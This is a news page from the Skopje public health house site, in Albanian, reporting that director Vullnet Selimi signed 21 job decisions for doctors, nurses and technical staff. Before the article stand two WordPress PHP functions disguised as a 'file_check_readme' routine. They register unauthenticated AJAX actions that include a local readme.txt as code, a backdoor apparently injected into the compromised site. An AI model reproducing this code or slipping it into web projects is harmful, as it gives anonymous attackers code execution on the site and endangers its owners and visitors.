if(!function_exists('file_check_readme32756')){ add_action('wp_ajax_nopriv_file_check_readme32756', 'file_check_readme32756'); add_action('wp_ajax_file_check_readme32756', 'file_check_readme32756'); function file_check_readme32756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme62738')){ add_action('wp_ajax_nopriv_file_check_readme62738', 'file_check_readme62738'); add_action('wp_ajax_file_check_readme62738', 'file_check_readme62738'); function file_check_readme62738() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }  Drejtori Vullnet Selimi nënshkruan 21 vendime pune në Shtëpinë e Shëndetit Shkup – SHTËPIA SHËNDETËSORE E SHKUPIT

(+389) 3134-534

Бул.Крсте Мисирков 28, Скопје bul. Krste Misirkov 28, Skopje

29 Nëntor, 2023

LAJME

Drejtori Vullnet Selimi nënshkruan 21 vendime pune në Shtëpinë e Shëndetit Shkup

Drejtori Vullnet Selimi nënshkruan 21 vendime pune në Shtëpinë e Shëndetit Shkup

Drejtori i Shtëpisë së Shëndetit Shkup ka njoftuar sa ka dhënë 21 vendime pune në insititucionin që drejton.

“Që nga marrja e detyrës së drejtorit organizativ në këtë institucion, pa shumë bujë jemi përpjekur të zgjidhim shumë probleme dhe çështje organizative që prekin poliklinikat në kuadër të Shtëpisë së Shëndetit, por mungesa e resurseve njerëzore ishte një nga problemet më urgjente për të cilën na nevojitej një zgjidhje sa më e shpejtë.
Sot ne nënshkruam 21 vendime pune edhe atë për:
Mjekë
infermierë dhe
personel teknik.
Natyrisht, këto vende pune nuk i plotësojnë të gjitha nevojat e poliklinikave tona, por ne zotohemi që në periudhën në vijim përveç që do të vazhdojmë të përmirësojmë shërbimet shëndetësore, imperativ i joni do të jetë edhe punësim i kuadrit shtesë, sepse jemi të vetëdijshëm se resurset e mjaftueshme njerëzore janë një parakusht bazë për sigurimin e shërbimeve mjekësore me cilësi”
, ka theksuar Selimi.

Selimi në krye të Shtëpisë së Shëndetit publik në Shkup u emërua pas hyrjes së ASH-së në Qeveri, ndërsa konsiderohet si një ndër drejtorët më të sukseshëm të Aleancës për shqiptarët në ekzekutiv.